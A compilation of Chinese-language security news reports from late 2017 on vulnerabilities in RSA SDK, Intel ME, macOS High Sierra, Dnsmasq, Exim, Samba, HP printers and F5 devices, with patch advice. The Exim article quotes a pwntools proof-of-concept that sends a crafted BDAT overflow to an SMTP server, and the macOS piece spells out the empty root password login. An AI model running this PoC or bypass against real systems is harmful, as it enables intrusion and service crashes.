HackerNews.cc 12 月 4 日消息，安全研究人员近期发现 RSA Authentication SDK （软件工具开发包）中存在两处关键漏洞 CVE-2017-14377、CVE-2017-14378，能够允许攻击者绕过身份验证机制后远程执行未授权操作。 第一处漏洞 CVE-2017-14377（CVSS v3 基础评分：10）：允许攻击者通过发送一份精心设计的数据包触发漏洞后绕过用户身份验证，并可在未经授权下远程访问目标系统重要资源。不过，仅当 Apache Web Server 的 RSA 身份验证代理程序配置为 TCP 协议与 RSA Authentication Manager 服务器进行通信时才会存在此漏洞现象。使用默认配置的 UDP 协议并不易遭受黑客攻击。 受影响版本： Ο RSA Authentication Agent for Web: Apache Web Server version 8.0 Ο RSA Authentication Agent for Web: Apache Web Server version 8.0.1 prior to Build 618 第二处漏洞 CVE-2017-14378（CVSS v3 基础评分：10）：允许攻击者通过该漏洞绕过身份验证。据悉，该漏洞主要存在于 RSA Auth Agent SDK C 版本，这意味着使用 SDK 开发的其他系统都普遍受到该漏洞影响。但是，该漏洞并不会影响 SDK  Java 版本。 受影响版本： Ο EMC RSA Authentication Agent SDK for C 8.6 Ο EMC RSA Authentication Agent API for C 8.5 解决方法： RSA 建议所有受影响客户尽早升级至安全版本 更多阅读： RSA Authentication SDK 漏洞详细报告: Ο http://seclists.org/fulldisclosure/2017/Nov/46 Ο http://seclists.org/fulldisclosure/2017/Nov/48 RSA Authentication SDK 漏洞补丁网址: Ο https://community.rsa.com/docs/DOC-40601#agents Ο https://community.rsa.com/community/products/securid/authentication-agent-web-apache 消息来源：securityaffairs.co，译者：青楚 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

前景提要：定制 Ubuntu 操作系统的电脑生产厂商 System76 近日发现 英特尔管理引擎的一个严重安全漏洞，该漏洞允许攻击者通过本地访问执行任意代码。因此 System76 表示， 将完全禁用英特尔管理引擎。 据 12 月 5 日消息，英特尔已经承认，其芯片管理引擎（Management Engine）程序存在重大安全漏洞，而现在一些PC供应商正在禁用 ME 技术来保护客户隐私。 英特尔 ME 相当于一个秘密操作系统，安装在主英特尔 CPU 之内。ME 组件是独立运行的，不会受到用户主 OS  的影响，它有独立的进程、线程、内存管理器、硬件总线驱动器、文件系统及其它组成部分。攻击者可以利用漏洞控制ME，进而控制整个计算机。 英特尔发言人在一份声明中表示：“ ME提供了我们用户关心的重要功能，包括诸如安全启动，双因素认证，系统恢复和企业设备管理等。” 11 月份，英特尔曾发出安全警报，说 ME 及其它英特尔 CPU 技术存在漏洞。 首先，备受推崇的 Linux 个人电脑制造商 System76 宣布，它正在发布一个开源程序，“ 类似于目前通过操作系统交付软件的方式，自动提供升级固件 ”。这个程序将 “ 在英特尔第六代，第七代和第八代笔记本电脑上自动升级带有禁用ME的固件 ”。 此程序只能在运行 Ubuntu 16.04 LTS，Ubuntu 17.04，Ubuntu 17.10，Pop！_OS 17.10 或 Ubuntu 衍生产品的笔记本电脑上运行，并安装 System76 驱动程序以接收最新的固件。 此前，第一家采取行动的公司名叫 Purism，该公司宣布将禁用运行开源 Coreboot 芯片固件的笔记本电脑中的 ME。但同时该公司也表示，要找到方法禁用 ME 不是一件容易的事，安全研究人员要花很多年才能找到办法真正禁用它。现在用户可以购买 Librem 13 和 Librem 15 产品，默认状态下它的ME是禁用的。 另外一家公司是戴尔，该公司也正在致力于为其英特尔 ME 固件计算机提供补丁，或者不够买具有 ME 组件的英特尔电脑。包括宏碁、富士通、惠普、联想、松下在内的 PC 供应商都表示受到了影响，也都承诺升级固件，修复漏洞，只是并非所有企业都兑现了承诺。 对于英特尔来说，理想的解决方案是让其开放程序和定制的 Minix，以便系统管理员可以确切知道在个人电脑，平板电脑和服务器上运行的是什么。或者英特尔给厂商和客户一个简单的选项来禁用这些芯片级程序。 相关阅读： Intel 管理引擎新漏洞，System 76 为其发布新固件 稿源：，稿件以及封面源自网络；

System76 是一家定制 Ubuntu 操作系统的电脑生产厂商，其定制产品有笔电、台式机和服务器。近日，System76 为最新的笔记本电脑推出固件更新，将完全禁用英特尔管理引擎。原因是它们发现了一个严重的安全漏洞，允许攻击者通过本地访问执行任意代码。 Systeme76 发布声明称，该公司计划从现在开始发布更新，禁用 Intel ME，涉及第六、第七和第八代酷睿处理器，目前联想、惠普、技嘉、微星等各大 PC 厂商均已采取了相应的措施。System76 还指出，英特尔 ME 不为 System76 笔记本提供该项功能，因此可以安全地禁用。 固件更新将仅适用于运行 Ubuntu 16.04 及以上版本的操作系统或者是使用 System76 驱动程序的相关操作系统。但是该公司表示正在开发一个命令行工具，该工具可运行在其他基于 GNU / Linux 的操作系统的笔记本电脑上，同时晚些时候将发布其台式电脑的更新。 稿源：，稿件以及封面源自网络；

11 月 28 日安全专家曝出了macOS High Sierra 10.13 存在严重安全威胁，即 root 账号密码为空的登陆漏洞，幸亏苹果第一时间就推送 macOS 安全更新，修复了root 账号登陆漏洞。其实在 11 月中旬有人就在苹果开发者论坛提到过相关问题，当时苹果可能并未引起重视。一位网友 Ergin 发布 Medium 读推分享了一则故事：“一周前我工作公司的 IT 员工在帮助我同事恢复本地管理员账号的时候，就发现了这一故障，他利用这一漏洞迅速恢复了账号权限。到了 11 月 23 日，公司的 IT 部门通知了苹果这一问题。他们还在苹果开发论坛上搜索了相关故障，发现在 11 月 13 日时就有人提到类似漏洞。但苹果并没有注意到。” Ergin 提到的苹果开发论坛相关故障报告帖实际上在 6 月 8 日就被发起了，一名用户在 WWDC 后更新至 macOS High Sierra beta 测试版本，他不明白为什么自己的管理员账号会变成标准账号。 许多用户也反映遇到了相同的问题。而在 11 月 13 日，chethan177 网友回复了这个帖子，提供了一个解决方案，并利用了 root 登陆账户密码空白的漏洞。这意味着这一漏洞被人发现已经至少有两周了，但并没有引起苹果和公众的注意。 随后，chethan177 网友再次回复了这一帖子，称他当时并不知道这其实是一个安全漏洞，一切似乎只是巧合。他此前遭遇了更改 Apple ID 后，管理员账户莫名其妙变成普通账户的问题。他在苹果论坛上搜索了好久，尝试了所有方法都没奏效。在极度的失望下，自己居然发现只要把账号名变成 ROOT，并且把密码留空就能得到最高权限。然后他恢复了自己账号的管理员权限，并且没有意识到这是一个安全漏洞。所以也没有向苹果报告。 稿源：cnBeta，封面源自网络；

前景提要：今年 10 月，谷歌安全专家发现广泛应用于 Linux、FreeBSD、 macOS、OpenBSD 和 NetBSD 设备的软件包 Dnsmasq 存在 7 处漏洞，其中三处允许黑客远程执行任意代码。 近期，西门子发布一份安全报告，证实 Dnsmasq 的 7 处安全漏洞中有 4 处仍影响了公司部分 SCALANCE 产品设备，包括基于直接访问节点的 W1750D 控制器、M800 工业路由器以及 S615 防火墙。随后， ICS-CERT 也针对 Dnsmasq 漏洞发布了一份关于西门子产品风险的安全报告。 DNSmasq 是一款为小型网络配置 DNS 与 DHCP 的工具，其提供了 DNS 和可选择的 DHCP 功能。不过，该款工具可服务于那些只在本地适用的域名（私有域名），而这些域名并不会在全球的 DNS 服务器中出现。 调查显示，影响西门子产品的其中 3 处漏洞（CVE-2017-13704、CVE-2017-14495 和 CVE-2017-14496）允许攻击者通过向 UDP 端口 53 发送 “精心制作” 的恶意 DNS 请求来攻击 Dnsmasq 进程，从而导致产品系统处于崩溃状态。此外，西门子 SCALANCE 产品还受 CVE-2017-13704 漏洞影响，允许攻击者触发 DoS 条件后开展拒绝服务攻击或在受害设备上执行任意代码。 目前，西门子正开发安全补丁，以解决其产品中的 Dnsmasq 漏洞问题。另外，对于等待修复的 SCALANCE W1750D 设备来说，如果用户未使用 “OpenDNS”、“Captive Portal” 或 “URL redirection”等功能时，可以在设备配置中部署防火墙规则阻止对端口 53/UDP 的入站访问；而对于 SCALANCE M800/S615 设备来说，可以在设备配置中禁用 DNS 代理或配置内部网络中已经连接的设备使用不同的DNS服务，以便抵制黑客恶意攻击。 消息来源：securityaffairs，译者：青楚 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

据国外媒体报道，苹果 macOS High Sierra 系统被曝出现多年来最大的安全漏洞，允许未授权用户无需密码就能获得系统管理权限。此外，还有可能被黑客远程安装恶意软件或控制操作系统。 据称，该安全漏洞只要在用户登录界面中的用户名一栏输入“ root ”，其密码栏无需输入任何内容，点击确定就可以解锁系统。随后，外媒网站记者在多台不同系统版本的 Mac 计算机上进行尝试，发现该漏洞仅限于 High Sierra 版本。目前，苹果表示正在开发软件更新解决问题，并建议用户设置 root 密码来阻止未授权用户访问 Mac 电脑。 11 月 30 日 跟进报道： 苹果昨日已发布 macOS 紧急安全补丁 Security Update 2017-001 修复这一严重的安全漏洞。与此同时，苹果也通过媒体对外发表声明，就此事所带来的影响向所有 Mac 用户道歉。苹果声明如下： 安全对每一款苹果产品来讲都是至关重要的，很遗憾我们在这次的 macOS 更新上犯了错误。当我们的安全工程师在昨天下午意识到这个问题的时候，我们立刻开始着手准备更新并修补漏洞。今晨 8 点，安全更新已经推送，从现在开始补丁将自动安装在运行 macOS High Sierra 10.13.1 的系统上。我们十分遗憾出现了这个错误，我们向所有 Mac 用户道歉，既对带来这样一个漏洞表示歉意，也对带来的关注表示歉意。我们正在审核我们的开发流程，防止这种情况再次发生。 稿源：腾讯科技、cnBeta，封面源自网络；

HackerNews.cc 11 月 27 日报道，台湾安全公司 DEVCORE 的研究人员 Meh 于近期发现互联网邮件传输代理（MTA）软件 Exim 存在一处关键漏洞（CVE-2017-16943），允许黑客向 SMTP 服务器发送 BDAT 命令，从而触发漏洞后远程执行任意代码。调查显示，有超过 40 万台服务器的分块功能已遭该漏洞影响。 Exim 是剑桥大学开发的一款基于 GPL 协议的开放源代码软件，其主要用于连接互联网 Unix 系统的消息传输代理（MTA）服务器。目前，据三月份进行的一百多万台邮件服务器的分析表明，超过 56% 的用户正在使用 Exim 软件。 调查显示，该漏洞由一台公共 bug 跟踪器检测发现并在补丁发布之前意外披露。一旦黑客恶意利用，其系统将会处于崩溃状态，因为该函数指针的 receive_getc 并未被重置。以下是该漏洞部分概念验证代码（PoC）显示： # pip install pwntools from pwn import * r = remote(‘localhost’, 25) r.recvline() r.sendline(“EHLO test”) r.recvuntil(“250 HELP”) r.sendline(“MAIL FROM:<test@localhost>”) r.recvline() r.sendline(“RCPT TO:<test@localhost>”) r.recvline() #raw_input() r.sendline(‘a’*0x1100+’\x7f’) #raw_input() r.recvuntil(‘command’) r.sendline(‘BDAT 1’) r.sendline(‘:BDAT \x7f’) s = ‘a’*6 + p64(0xdeadbeef)*(0x1e00/8) r.send(s+ ‘:\r\n’) r.recvuntil(‘command’) #raw_input() r.send(‘\n’) r.interactive() exit() 虽然跟踪器会警示 Exim 软件存在漏洞，但根据用户习惯来看告警通知极有可能被忽略。不过，现开发人员已采取安全措施防止此类事件恶意发展，并提醒运行 Exim 4.88 或更高版本的用户将其主要配置参数 chunking_advertise_hosts 设置为空值，从而禁用 ESMTP 扩展、使 BDAT 无法使用，以便关闭易受攻击程序。 另外，研究人员发现的另一个漏洞（CVE-2017-16944）能够允许黑客利用 BDAT 命令与恶意函数远程开展拒绝服务（DoS）攻击。该漏洞影响了 Exim 4.88 和 4.89 中的 SMTP 后台进程。对此，研究人员建议系统管理人员尽快更新至 Exim 4.90 版本，以防可能的黑客恶意攻击。 消息来源：securityaffairs.co，译者：青楚 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

据外媒 11 月 23 日报道，网络安全公司的研究人员于今年 9 月发现 Samba SMB1 协议存在一处 UAF 漏洞（CVE-2017-14746），允许黑客通过 SMB1 请求重新分配堆指针后不仅可以控制堆上的信息，还可通过漏洞攻击 SMB 服务器，受影响范围包括 Samba 4.0.0 以前所有版本。 Red Hat、Ubuntu、Debian 等主要的 Linux 发行版厂商近期推出了 4.7.3、4.6.11 和 4.5.15 版本的修复补丁。另外，研究人员还提供了一个解决方案，建议用户可以通过设置参数禁止访问 SMB1 服务器： ○ server min protocol = SMB2 ○ to the [global] section of your smb.conf and restart smbd. 但是，需要注意的是这可能会影响之前的用户无法连接到服务器。 对于 Samba 还存在的另一漏洞（CVE-2017-15275），目前官方也已经释出修复补丁，曾允许攻击者通过精心构造的恶意请求发送至受影响版本（ 3.6.0 以后的所有版本）的服务器，从而获取系统内存中未被清除的哈希密码或其他敏感数据。 这一漏洞导致受害系统的服务器在分配堆内存时可能会在未清除下将其先前所包含的敏感数据返回至客户端，从而使攻击者获取重要信息后通过其他方法破坏系统服务器。 HackerNews.cc 在此强烈建议使用 Samba 的用户/企业及时修复补丁或更新系统至最新版本。 更多内容： 4.7.3、4.6.11 和 4.5.15 版本补丁地址：http://www.samba.org/samba/security/ 一些已不被支持的旧版本补丁地址：https://www.samba.org/samba/patches/ 消息来源：securityaffairs.co ，译者：青楚 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

HackerNews.cc 11 月 22 日报道，网络安全公司 FoxGlove 研究人员近期在惠普部分企业的打印机中发现一处高危漏洞，允许黑客入侵目标系统后远程执行恶意代码。 知情人士透露，惠普在设计安全打印系统方面投入了大量精力，其公司早于 2015 年就已推出企业级 LaserJet 打印机，并在后续不同时间内陆续推出多项安全性能改进。据悉，这家科技巨头曾声称提供了“全球最安全的打印服务”，而且还发布了一项调查报告，指出其他供应厂商的打印设备极易遭受黑客攻击并会对企业造成重大损失。 研究人员表示，他们主要使用了一款由德国鲁尔大学安全专家开发的黑客工具 PRET（PRinter Exploitation Toolkit）通过 HP PageWide Enterprise 586dn 和 HP LaserJet Enterprise M553n 两款多功能打印机的操作系统与设备固件进行了一项逆向渗透测试。据称，这款黑客工具曾用于检测戴尔、兄弟、Konica、三星、HP、OKI 和 Lexmark 等 20 余款打印设备是否存在安全漏洞。 PRET 工具的神奇之处在于查找路径漏洞时不仅可以规避安全检测、访问任何打印内容（包括受 PIN 码保护的内容），还可用于发现操控打印内容的安全漏洞后将其设备恢复出厂设置。 研究团队在分析了固件更新与 HP 软件解决方案后发现可以利用 OXP 平台和 SDK 来扩展打印设备功能。不过，该解决方案和固件更新必须经过数字签名的单个 .BDL 文件提供。此外，由于签名验证需要安全检测，因此 FoxGlove 研究人员未能成功将恶意固件上传至目标设备。但是，他们设计了其他攻击媒介用于破解签名验证并设法上传恶意 DLL 文件后执行任意代码。 目前，惠普已收到 FoxGlove 研究人员在测试期间所使用的工具源代码以及漏洞概念验证（PoC）报告，并表示将于本周发布安全更新，修复漏洞补丁。 消息来源：securityaffairs.co ，译者：青楚 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

HackerNews.cc 11 月 20 日消息，德国鲁尔大学的研究人员 Hanno Böck 与 Juraj Somorovsky 近期发现美国应用交付网络（ADN）领域的 F5 Networks 产品存在一处高危漏洞（CVE-2017-6168、CVSS 分值为 9.1），允许黑客远程恢复加密数据并发动中间人（MitM）攻击。目前，受影响产品是 F5 BIG-IP 企业管理器的一部分，其中包括 LTM、AAM、AFM、Analytics、APM、ASM、DNS、GTM、Link Controller 与 PEM 等产品。此外，该漏洞也影响了 F5 WebSafe 反欺诈解决方案。 调查显示，该漏洞在线暴露了虚拟服务器配置客户端的 SSL 配置和 RSA 密钥交换功能，从而允许黑客发动 chosen-ciphertext 攻击（又称 Bleichenbacher 攻击）。此外攻击者还可通过该漏洞针对使用 RSA 密钥交换器建立的 TLS 会话发起黑客攻击、远程恢复加密数据并启动中间人 （MitM） 攻击。网络安全公司 Cloudflare 的安全专家 Nick Sullivan 指出，该漏洞与臭名昭着的 DROWN 类似，允许攻击者在使用 SSLv2 时解密 TLS 通信。不过随着 SSLv2 需求的消除，F5 Networks 漏洞也变得愈加严重，因为黑客只需要一个使用密钥的服务器就可解密 TLS 会话。 另外，F5 Networks 在其安全报告中表示：“黑客恢复的加密数据需要在 TLS 会话结束后才可读取。利用此漏洞进行 MiTM 攻击需要攻击者在配置的握手超时窗口内的目标会话握手阶段完成初始攻击，这可能需要数百万次服务器请求。“这种攻击可以针对任何使用 RSA 签名的 TLS 会话进行，但只有在使用 RSA 密钥交换的密码套件也在虚拟服务器上启用的情况下适用。机会有限，带宽限制和延迟使得这种攻击更难执行”。 目前，F5 Networks 已修复受影响产品的安全漏洞并发布更新。此外，该公司还提醒各企业检查自家虚拟服务器的通用警报是否已经开启，以便抵制黑客攻击的同时减少各企业利益的损失。 消息来源：securityweek，译者：青楚 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。